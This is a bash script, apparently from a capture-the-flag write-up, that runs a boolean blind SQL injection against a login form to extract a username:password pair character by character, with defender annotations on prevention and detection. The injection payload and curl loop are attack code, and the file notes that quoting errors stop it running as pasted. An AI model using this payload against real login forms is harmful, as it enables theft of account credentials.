- #!/bin/bash
# Boolean-based blind SQL injection probe against a login form, kept as posted.
# Each request places a SQL condition in the `username` POST field; the script
# decides true/false by whether the response body contains the string "admin".
#
# Defender notes:
#   - The payload only makes sense if login.php builds its query by
#     concatenating the username parameter (inferred, the handler is not
#     shown). Bound parameters / prepared statements remove the injection point.
#   - The true/false signal is a visible difference in the login response;
#     a uniform failure response removes that oracle.
#   - Detection: bursts of POSTs to the login endpoint under one session
#     cookie (up to 126 per character position here) whose username field
#     contains `ascii(substring(` and a trailing `-- -` comment.
#
# NOTE(review): every line of this paste carries a leading "- " from the page
# extraction, and the curl line has unbalanced quotes, so the listing does not
# run as shown.
#
# Outer loop: character position inside concat(username,0x3a,password).
# 0x3a is ':'; starting at 7 skips a six-character prefix such as "admin:"
# (presumably the first row is the admin account, confirm).
- for x in {7..40} # password char location in the payload
- do
# Inner loop: candidate ASCII code, tried in ascending order (linear search).
- for i in {1..126} #check ASCII code number
- do
# The injected condition is true while the character's ASCII code is greater
# than $i. `limit 0,1` restricts the subquery to the first row of `users`;
# `-- -` comments out the remainder of the original statement.
- payload="username=admin' AND ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),$x,1))>$i -- -&password=test"
# NOTE(review): quoting is unbalanced as pasted (the single quote opened before
# "$payload" and the double quote opening the cookie value are not closed with
# matching characters). The session cookie and the RFC 1918 target address are
# hard-coded; a session id published like this should be treated as disclosed.
# curl's stderr is discarded and the response body is written to file.out in
# the current directory.
- curl -A "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0" -d ''"$payload"' -X POST -H "Content-Type: application/x-www-form-urlencoded" --cookie "PHPSESSID=k2d2o9s39uhurtr7kk11af5ac2' http://10.10.10.73/login.php 2> /dev/null -o file.out
# Only grep's exit status is used; `cond` itself is never read afterwards.
- cond=`grep admin file.out`
- status=$?
# Non-zero status means "admin" is absent from the response, which the script
# treats as the condition having turned false, i.e. $i equals the character's
# ASCII code.
- if [ $status != 0 ]
- then
# Prints the position and code, then the character itself via a \x hex escape.
- echo "Digit$x: $i and value ";printf "\x$(printf %x $i)"
- printf "\n"
- break;
- fi
- done
- done